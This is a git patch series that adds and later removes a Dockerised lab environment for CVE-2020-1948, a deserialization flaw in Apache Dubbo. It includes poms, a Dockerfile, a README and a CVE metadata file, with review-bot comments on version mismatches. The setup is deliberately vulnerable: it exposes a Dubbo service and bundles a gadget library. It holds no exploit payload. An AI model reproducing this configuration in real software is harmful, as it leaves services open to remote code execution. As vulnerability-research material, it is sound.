@@ -0,0 +1,96 @@ + + + + + org.apache.dubbo + dubbo-spring-boot-parent + ${revision} + ../dubbo-spring-boot-parent/pom.xml + + 4.0.0 + + org.apache.dubbo.samples + dubbo-spring-boot-samples + pom + Apache Dubbo Spring Boot :: Samples + Apache Dubbo Spring Boot :: Samples + + + sample-api + auto-configure-samples + + + + + + + org.apache.maven.plugins + maven-deploy-plugin + + true + + + + + + + + + + spring-boot-1.3 + + 1.3.8.RELEASE + + + + + + spring-boot-1.4 + + 1.4.7.RELEASE + + + + + + spring-boot-1.5 + + 1.5.21.RELEASE + + + + + + spring-boot-2.0 + + 2.0.9.RELEASE + + + + + + spring-boot-2.1 + + 2.1.13.RELEASE + + + + + \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml new file mode 100644 index 00000000..bc73fab8 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml @@ -0,0 +1,33 @@ + + + + + org.apache.dubbo.samples + dubbo-spring-boot-samples + ${revision} + ../pom.xml + + 4.0.0 + + dubbo-spring-boot-sample-api + Apache Dubbo Spring Boot :: Samples :: API + Apache Dubbo Spring Boot Samples API + + \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java new file mode 100644 index 00000000..398591b8 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java 
@@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.dubbo.spring.boot.sample.consumer; + +/** + * Demo Service interface + * + * @since 2.7.0 + */ +public interface DemoService { + + String sayHello(String name); + +} \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml new file mode 100644 index 00000000..664fec48 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml 
@@ -0,0 +1,197 @@ + + + + 4.0.0 + + + org.apache + apache + 21 + + + org.apache.dubbo + dubbo-spring-boot-project + ${revision} + + pom + + Apache Dubbo Spring Boot Project + Apache Dubbo Spring Boot Project + https://github.com/apache/dubbo-spring-boot-project + + + 3.0.1 + 2.19.1 + 2.7.7 + + + + dubbo-spring-boot-parent + dubbo-spring-boot-samples + + + + The Apache Software Foundation + http://www.apache.org/ + + + + https://github.com/apache/dubbo-spring-boot-project + scm:git:git:////github.com/apache/dubbo-spring-boot-project.git + scm:git:ssh://git@//github.com/apache/dubbo-spring-boot-project.git + + + + + Github + https://github.com/apache/dubbo-spring-boot-project/issues + + + + + Development List + dev-subscribe@dubbo.apache.org + dev-unsubscribe@dubbo.apache.org + dev@dubbo.apache.org + + + Commits List + commits-subscribe@dubbo.apache.org + commits-unsubscribe@dubbo.apache.org + commits@dubbo.apache.org + + + Issues List + issues-subscribe@dubbo.apache.org + issues-unsubscribe@dubbo.apache.org + issues@dubbo.apache.org + + + + + Apache Dubbo + The Apache Dubbo Project Contributors + dev@dubbo.apache.org + http://dubbo.apache.org + + + + + + release + + + + org.apache.maven.plugins + maven-javadoc-plugin + 3.1.1 + + + package + + jar + + + + + + + org.apache.maven.plugins + maven-gpg-plugin + 1.6 + + + verify + + sign + + + + + + + org.codehaus.mojo + flatten-maven-plugin + 1.1.0 + + true + resolveCiFriendliesOnly + + + + flatten + process-resources + + flatten + + + + flatten.clean + clean + + clean + + + + + + + + + + + + + + org.codehaus.mojo + flatten-maven-plugin + 1.1.0 + + true + resolveCiFriendliesOnly + + + + flatten + process-resources + + flatten + + + + flatten.clean + clean + + clean + + + + + + + + + + org.codehaus.mojo + flatten-maven-plugin + + + + + \ No newline at end of file -- Gitee From 02506f23189a4b82b1a46806c9f1fb0f98d8cee0 Mon Sep 17 00:00:00 2001 
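Review bot: The `revision` property appears to be `2.7.7` (the third value in the properties block, after the 3.0.1 and 2.19.1 plugin versions), and the parent pom sets `dubbo.version` to `${revision}`, so the image builds Dubbo 2.7.7 while the accompanying CVE-2020-1948.yaml lists the affected range as 2.7.0-2.7.6. One of the two needs reconciling: either pin `revision` to a version inside the documented range (e.g. `2.7.6`) or document in the README why 2.7.7 still reproduces the issue. Markup is stripped here, so the property name is inferred from position; please confirm against the actual file.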
From: GQ246 Date: Fri, 7 Apr 2023 16:05:13 +0000 Subject: [PATCH 4/8] add cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml. Signed-off-by: GQ246 --- cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml diff --git a/cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml b/cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml new file mode 100644 index 00000000..f3364260 --- /dev/null +++ b/cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml @@ -0,0 +1,21 @@ +id: CVE-2020-1948 +source: https://github.com/txrw/Dubbo-CVE-2020-1948 +info: + name: Dubbo是一个高性能优秀的服务框架。 + severity: CRITICAL + description: | + 此漏洞会影响所有使用2.7.6或更低版本的Dubbo用户。攻击者可以发送具有无法识别的服务名称或方法名称以及一些恶意参数有效负载的 RPC 请求。当恶意参数反序列化时,它会执行一些恶意代码。更多细节可以在下面找到。 + scope-of-influence: + Dubbo 2.5.0-2.5.10 + Dubbo 2.6.0-2.6.7 + Dubbo 2.7.0-2.7.6 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-1948 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-1948 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None + tags: cve2020, Dubbo \ No newline at end of file -- Gitee From 5ce544472b7315330bb5d4ca646b83e0391eb36e Mon Sep 17 00:00:00 2001 
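Review bot: `source:` points at `https://github.com/txrw/Dubbo-CVE-2020-1948` while the README in PATCH 3/8 credits the DSO-Lab environment and links its wiki for the verification steps; the two should agree, or both should be listed. The description ends with "更多细节可以在下面找到" ("more details can be found below") but nothing follows — that sentence was carried over from the upstream advisory and should be dropped or replaced by the NVD reference. `scope-of-influence` says 2.7.0-2.7.6 while the lab's root pom appears to build 2.7.7; reconcile the two.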
From: GQ246 Date: Tue, 11 Apr 2023 14:54:19 +0000 Subject: [PATCH 5/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache-Dubbo/2020?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2020/CVE-2020-1948/Dockerfile | 19 - cve/apache-Dubbo/2020/CVE-2020-1948/README.md | 73 --- .../2020/CVE-2020-1948/docker-compose.yml | 9 - .../src/dubbo-spring-boot-parent/pom.xml | 459 ------------------ .../auto-configure-samples/pom.xml | 38 -- .../provider-sample/pom.xml | 89 ---- ...bboAutoConfigurationProviderBootstrap.java | 38 -- .../provider/service/DefaultDemoService.java | 62 --- .../src/main/resources/application.properties | 12 - .../src/dubbo-spring-boot-samples/pom.xml | 96 ---- .../sample-api/pom.xml | 33 -- .../boot/sample/consumer/DemoService.java | 28 -- .../2020/CVE-2020-1948/src/pom.xml | 197 -------- cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml | 21 - 14 files changed, 1174 deletions(-) delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/README.md delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java delete mode 100644 
cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml delete mode 100644 cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile b/cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile deleted file mode 100644 index 59c3351c..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile +++ /dev/null @@ -1,19 +0,0 @@ -FROM maven:3.5-jdk-8 AS pre_jar - -COPY src/ /src/ - -WORKDIR /src/ - -RUN mvn package -DskipTests=true - -FROM szgx/java:8u111_debian - -LABEL maintainer="mO0n@guanxin" version="1.0" - -COPY --from=pre_jar --chown=0:0 /src/target/dubbo.jar /dubbo.jar - -WORKDIR / - -ENTRYPOINT ["bash", "-c", "java -jar /dubbo.jar"] - -EXPOSE 12345 \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/README.md b/cve/apache-Dubbo/2020/CVE-2020-1948/README.md deleted file mode 100644 index f7e4fd14..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/README.md +++ /dev/null 
@@ -1,73 +0,0 @@ -# Apache Dubbo CVE-2020-1948 测试环境 - -## 引子 - -在这个漏洞出现之初,为了验证该漏洞的危害,我们从互联网上搜寻了很多人整理的例子,发现没有一个能够顺利验证该漏洞,故自己搞了一个,放在这里供大家参考,欢迎交流! - -本环境基于 Apache Dubbo 官方示例环境改造而来,纠正了官方示例程序中几处编译中报错问题。例如: - -- 官方示例代码中应用的 DubboService 类,实际应该 Service。 - -## 编译 - -``` -cd src -mvn package -``` - -编译成功后会在 `src/target` 目录生成 `dubbo.jar` 文件。 - -## 运行 - -``` -java -jar target/dubbo.jar -``` - -运行成功后,监听 12345 端口,可以使用 `telnet` 命令连接测试。 - -``` -telnet x.x.x.x 12345 -# dubbo> ls -l -# PROVIDER: -# org.apache.dubbo.spring.boot.sample.consumer.DemoService:1.0.0 -> published: N -``` - -## 容器化 - -``` -# 构建 -docker build -t dsolab/dubbo:cve-2020-1948 . - -# 运行 -docker run -p 12345:12345 dsolab/dubbo:cve-2020-1948 -d -或 -docker-compose up -d - -# 访问 -telnet x.x.x.x 12345 -``` - -只想快速使用环境(懒得编译环境)的小朋友可以用下面的命令启动我们提供的镜像环境: - -``` -# 需要安装 Docker 和 docker-compose -docker-compose up -d -``` - -## 漏洞验证 - -参见 [Apache Dubbo CVE-2020-1948 反序列化漏洞验证方法](https://github.com/DSO-Lab/Dubbo-CVE-2020-1948/wiki) - -## 参考链接 - -- Dubbo Spring Boot Project - -https://github.com/apache/dubbo-spring-boot-project/ - -- Dubbo Pull Request - -https://github.com/apache/dubbo/pull/6374 - -- Dubbo Mail Archive - -https://www.mail-archive.com/dev@dubbo.apache.org/msg06544.html diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml b/cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml deleted file mode 100644 index b0ff1ed7..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml +++ /dev/null @@ -1,9 +0,0 @@ -version: "3" - -services: - api: - build: . - image: dsolab/dubbo:cve-2020-1948 - container_name: cve-2020-1948 - ports: - - "12345:12345" \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml deleted file mode 100644 index 836b4700..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml +++ /dev/null 
@@ -1,459 +0,0 @@ - - - - - org.apache.dubbo - dubbo-spring-boot-project - ${revision} - ../pom.xml - - - 4.0.0 - - dubbo-spring-boot-parent - pom - Apache Dubbo Spring Boot :: Parent - Apache Dubbo Spring Boot Parent - - - 1.8 - 1.8 - 1.8 - UTF-8 - UTF-8 - 2.3.0.RELEASE - ${revision} - - -server -Xms256m -Xmx512m -Dfile.encoding=UTF-8 -Djava.net.preferIPv4Stack=true - - - - - 3.0.2 - 3.6.0 - 3.0.1 - 0.8.2 - 1.5 - 0.12 - 2.5.3 - 2.19.1 - - - - - - - org.springframework.boot - spring-boot-dependencies - ${spring-boot.version} - pom - import - - - - - org.apache.dubbo - dubbo-dependencies-bom - ${dubbo.version} - pom - import - - - - org.apache.dubbo - dubbo - ${dubbo.version} - - - org.springframework - spring - - - javax.servlet - servlet-api - - - log4j - log4j - - - - - - - - - - - central - https://repo.maven.apache.org/maven2 - - false - - - - - apache.snapshots.https - Apache Development Snapshot Repository - https://repository.apache.org/content/repositories/snapshots - - false - - - true - - - - - spring-milestone - Spring Milestone - https://repo.spring.io/milestone - - false - - - - spring-snapshot - Spring Snapshot - https://repo.spring.io/snapshot - - true - - - - rabbit-milestone - Rabbit Milestone - https://dl.bintray.com/rabbitmq/maven-milestones - - false - - - - - - - central - https://repo.maven.apache.org/maven2 - - false - - - - spring-milestone - Spring Milestone - https://repo.spring.io/milestone - - false - - - - spring-snapshot - Spring Snapshot - https://repo.spring.io/snapshot - - true - - - - - - - - - src/main/resources/ - false - - - ../ - META-INF/ - false - - NOTICE - LICENSE - - - - - - org.apache.maven.plugins - maven-jar-plugin - ${maven-jar-plugin.version} - - - true - true - - true - true - - - ${project.version} - ${project.version} - - - - - - - org.apache.maven.plugins - maven-compiler-plugin - ${maven-compiler-plugin.version} - - true - ${java.source.version} - ${java.target.version} - ${project.build.sourceEncoding} - - - - - 
org.jacoco - jacoco-maven-plugin - ${maven-jacoco-plugin.version} - - - jacoco-initialize - - prepare-agent - - - jacocoArgLine - - - - jacoco-site - package - - report - - - - - - - org.apache.maven.plugins - maven-enforcer-plugin - - - enforce-rules - - enforce - - - - - [1.8,) - - - project.name - - - project.description - - - true - - - - - - org.apache.maven.plugins - maven-source-plugin - ${maven-source-plugin.version} - - - attach-sources - - jar-no-fork - - - - - - org.apache.maven.plugins - maven-surefire-plugin - ${maven-surefire-plugin.version} - - true - once - ${argline} ${jacocoArgLine} - - - - transporter - ${transporter} - - - serialization - ${serialization} - - - - port - ${port} - - - threadpool - ${threadpool} - - - threads - ${threads} - - - iothreads - ${iothreads} - - - - server - ${server} - - - timeout - ${timeout} - - - length - ${length} - - - connections - ${connections} - - - base - ${base} - - - concurrent - ${concurrent} - - - runs - ${runs} - - - onerror - ${onerror} - - - - - - org.apache.rat - apache-rat-plugin - ${apache-rat-plugin.version} - - - verify.rat - verify - - check - - - - **/*.versionsBackup - **/.idea/ - **/*.iml - **/*.txt - **/*.load - **/*.flex - **/*.fc - **/*.javascript - **/*.properties - **/*.yml - **/*.yaml - **/*.thrift - **/*.sh - **/*.bat - **/*.md - .git/ - .gitignore - - .repository/ - **/.settings/* - **/.classpath - **/.project - **/target/** - **/*.log - CODE_OF_CONDUCT.md - .codecov.yml - .travis.yml - PULL_REQUEST_TEMPLATE.md - CONTRIBUTING.md - README.md - README_CN.md - **/codestyle/* - **/resources/META-INF/** - **/*.factories - **/*.provides - **/*.properties - **/*.json - - - - - - - - org.apache.maven.plugins - maven-release-plugin - ${maven-release-plugin.version} - - true - false - release - deploy - ${arguments} - - - - - - - - - - spring-boot-2.0 - - 2.0.9.RELEASE - - - - - - spring-boot-2.1 - - 2.1.13.RELEASE - - - - - - spring-boot-2.2 - - 2.2.7.RELEASE - - - - - 
diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml deleted file mode 100644 index a4310f16..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml +++ /dev/null @@ -1,38 +0,0 @@ - - - - - org.apache.dubbo.samples - dubbo-spring-boot-samples - ${revision} - ../pom.xml - - 4.0.0 - - dubbo-spring-boot-auto-configure-samples - Apache Dubbo Spring Boot :: Samples :: Auto-Configure - Apache Dubbo Spring Boot Auto-Configure Samples - pom - - - provider-sample - - - \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml deleted file mode 100644 index 6150f021..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml +++ /dev/null @@ -1,89 +0,0 @@ - - - - - org.apache.dubbo.samples - dubbo-spring-boot-auto-configure-samples - ${revision} - ../pom.xml - - 4.0.0 - - dubbo-spring-boot-auto-configure-provider-sample - Apache Dubbo Spring Boot :: Samples :: Auto-Configure :: Provider Sample - - - - - - org.springframework.boot - spring-boot-starter - - - - org.apache.dubbo - dubbo-spring-boot-starter - ${revision} - - - - org.apache.dubbo - dubbo-remoting-api - ${revision} - - - - org.apache.dubbo.samples - dubbo-spring-boot-sample-api - ${revision} - - - - com.rometools - rome - 1.7.0 - - - - - - - - org.springframework.boot - spring-boot-maven-plugin - ${spring-boot.version} - - - - repackage - - - - - false - dubbo - ${user.dir}/target - - - - - - - \ No newline at end of file 
diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java deleted file mode 100644 index 0c2c2392..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java +++ /dev/null 
@@ -1,38 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package org.apache.dubbo.spring.boot.sample.provider.bootstrap; - -import org.apache.dubbo.spring.boot.sample.provider.service.DefaultDemoService; - -import org.springframework.boot.SpringApplication; -import org.springframework.boot.autoconfigure.EnableAutoConfiguration; - -/** - * Dubbo Auto-Configuration Provider Bootstrap - * - * @see DefaultDemoService - * @since 2.7.0 - */ -@EnableAutoConfiguration -public class DubboAutoConfigurationProviderBootstrap { - - public static void main(String[] args) { -// new SpringApplicationBuilder(DubboAutoConfigurationProviderBootstrap.class) -// .run(args); - SpringApplication.run(DubboAutoConfigurationProviderBootstrap.class,args); - } -} diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java deleted file mode 100644 index 91c8ea5d..00000000 
--- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java +++ /dev/null 
@@ -1,62 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package org.apache.dubbo.spring.boot.sample.provider.service; - -import org.apache.dubbo.config.annotation.Service; -import org.apache.dubbo.spring.boot.sample.consumer.DemoService; - -import org.slf4j.Logger; -import org.slf4j.LoggerFactory; -import org.springframework.beans.factory.annotation.Value; - -import java.util.Random; - -/** - * Default {@link DemoService} - * - * @see DemoService - * @since 2.7.0 - */ -@Service(version = "1.0.0") -public class DefaultDemoService implements DemoService { - - private final Logger logger = LoggerFactory.getLogger(getClass()); - - private final Random costTimeRandom = new Random(); - - /** - * The default value of ${dubbo.application.name} is ${spring.application.name} - */ - @Value("${dubbo.application.name}") - private String serviceName; - - @Override - public String sayHello(String name) { - await(); - return String.format("[%s] : Hello, %s", serviceName, name); - } - - private void await() { - try { - long timeInMillisToWait = costTimeRandom.nextInt(500); - Thread.sleep(timeInMillisToWait); - logger.info("execution time : " + timeInMillisToWait + " ms."); - } catch (InterruptedException e) { - throw new 
RuntimeException(e); - } - } -} \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties deleted file mode 100644 index db9e2dbf..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties +++ /dev/null @@ -1,12 +0,0 @@ -# Spring boot application -spring.application.name=dubbo-auto-configuration-provider-demo -# Base packages to scan Dubbo Component: @org.apache.dubbo.config.annotation.Service -dubbo.scan.base-packages=org.apache.dubbo.spring.boot.sample.provider.service -# Dubbo Application -## The default value of dubbo.application.name is ${spring.application.name} -## dubbo.application.name=${spring.application.name} -# Dubbo Protocol -dubbo.protocol.name=dubbo -dubbo.protocol.port=12345 -## Dubbo Registry -dubbo.registry.address=N/A \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml deleted file mode 100644 index 72f28dee..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml +++ /dev/null 
@@ -1,96 +0,0 @@ - - - - - org.apache.dubbo - dubbo-spring-boot-parent - ${revision} - ../dubbo-spring-boot-parent/pom.xml - - 4.0.0 - - org.apache.dubbo.samples - dubbo-spring-boot-samples - pom - Apache Dubbo Spring Boot :: Samples - Apache Dubbo Spring Boot :: Samples - - - sample-api - auto-configure-samples - - - - - - - org.apache.maven.plugins - maven-deploy-plugin - - true - - - - - - - - - - spring-boot-1.3 - - 1.3.8.RELEASE - - - - - - spring-boot-1.4 - - 1.4.7.RELEASE - - - - - - spring-boot-1.5 - - 1.5.21.RELEASE - - - - - - spring-boot-2.0 - - 2.0.9.RELEASE - - - - - - spring-boot-2.1 - - 2.1.13.RELEASE - - - - - \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml deleted file mode 100644 index bc73fab8..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml +++ /dev/null @@ -1,33 +0,0 @@ - - - - - org.apache.dubbo.samples - dubbo-spring-boot-samples - ${revision} - ../pom.xml - - 4.0.0 - - dubbo-spring-boot-sample-api - Apache Dubbo Spring Boot :: Samples :: API - Apache Dubbo Spring Boot Samples API - - \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java deleted file mode 100644 index 398591b8..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java +++ /dev/null 
@@ -1,28 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package org.apache.dubbo.spring.boot.sample.consumer; - -/** - * Demo Service interface - * - * @since 2.7.0 - */ -public interface DemoService { - - String sayHello(String name); - -} \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml deleted file mode 100644 index 664fec48..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml +++ /dev/null 
@@ -1,197 +0,0 @@ - - - - 4.0.0 - - - org.apache - apache - 21 - - - org.apache.dubbo - dubbo-spring-boot-project - ${revision} - - pom - - Apache Dubbo Spring Boot Project - Apache Dubbo Spring Boot Project - https://github.com/apache/dubbo-spring-boot-project - - - 3.0.1 - 2.19.1 - 2.7.7 - - - - dubbo-spring-boot-parent - dubbo-spring-boot-samples - - - - The Apache Software Foundation - http://www.apache.org/ - - - - https://github.com/apache/dubbo-spring-boot-project - scm:git:git:////github.com/apache/dubbo-spring-boot-project.git - scm:git:ssh://git@//github.com/apache/dubbo-spring-boot-project.git - - - - - Github - https://github.com/apache/dubbo-spring-boot-project/issues - - - - - Development List - dev-subscribe@dubbo.apache.org - dev-unsubscribe@dubbo.apache.org - dev@dubbo.apache.org - - - Commits List - commits-subscribe@dubbo.apache.org - commits-unsubscribe@dubbo.apache.org - commits@dubbo.apache.org - - - Issues List - issues-subscribe@dubbo.apache.org - issues-unsubscribe@dubbo.apache.org - issues@dubbo.apache.org - - - - - Apache Dubbo - The Apache Dubbo Project Contributors - dev@dubbo.apache.org - http://dubbo.apache.org - - - - - - release - - - - org.apache.maven.plugins - maven-javadoc-plugin - 3.1.1 - - - package - - jar - - - - - - - org.apache.maven.plugins - maven-gpg-plugin - 1.6 - - - verify - - sign - - - - - - - org.codehaus.mojo - flatten-maven-plugin - 1.1.0 - - true - resolveCiFriendliesOnly - - - - flatten - process-resources - - flatten - - - - flatten.clean - clean - - clean - - - - - - - - - - - - - - org.codehaus.mojo - flatten-maven-plugin - 1.1.0 - - true - resolveCiFriendliesOnly - - - - flatten - process-resources - - flatten - - - - flatten.clean - clean - - clean - - - - - - - - - - org.codehaus.mojo - flatten-maven-plugin - - - - - \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml 